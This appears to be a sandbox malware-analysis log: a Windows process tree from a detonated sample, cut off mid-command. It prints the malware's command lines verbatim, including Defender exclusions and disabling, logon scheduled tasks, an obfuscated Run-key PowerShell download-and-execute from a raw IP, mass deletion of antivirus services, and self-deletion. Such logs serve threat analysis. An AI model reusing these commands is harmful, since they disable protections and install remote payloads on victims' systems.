                                                                                                                                                PID:5712
                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                PID:2296
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                1⤵
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:5248
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                1⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:5076
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4186.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4186.exe
                                                                                                                                                1⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:5328
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4531.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4531.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:2212
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\qwLPEkaHSMwc.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\qwLPEkaHSMwc.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5544
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\47B3.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\47B3.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    • System policy modification
                                                                                                                                                    PID:5644
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5972
                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6020
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AF71.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\AF71.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4532
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\AF71.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4904
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                3⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:5096
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D74D.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D74D.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2580
                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6136
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4640
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4240
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4160
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5456
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\D74D.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4708
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\D74D.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              PID:2644
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:4260
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:5556
                                                                                                                                                                                • C:\Windows\system32\services32.exe
                                                                                                                                                                                  "C:\Windows\system32\services32.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6056
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5068
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5028
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:4692
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:1044
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:5820
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5652
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    PID:5316
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:5024
                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2272
                                                                                                                                                                                                      • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:5348
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:4676
                                                                                                                                                                                                            • C:\Windows\system32\choice.exe
                                                                                                                                                                                                              choice /C Y /N /D Y /T 3
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:5944
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5276
                                                                                                                                                                                                          • C:\Windows\system32\choice.exe
                                                                                                                                                                                                            choice /C Y /N /D Y /T 3
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:3896
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\74D7.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\74D7.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:6084
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\74D7.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\74D7.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1980
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\74D7.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\74D7.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5552
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\74D7.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\74D7.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4736
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\74D7.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4748
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\74D7.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4204
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7B11.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7B11.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4964
                                                                                                                                                                                                                  • C:\ProgramData\Runtimebroker.exe
                                                                                                                                                                                                                    "C:\ProgramData\Runtimebroker.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                                    PID:2256
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91''+''.241''+''.19''+''.52/Ru''+''nt''+''im''+''ebr''+''oke''+''r.exe''),(''Vpnm.''+''e''+''xe''));Start-Process (''V''+''p''+''nm.exe'')'
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4544
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4484
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3760
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5968
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5404
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1172
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1016
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:6132
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4064
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:1504
                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4140
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:496
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 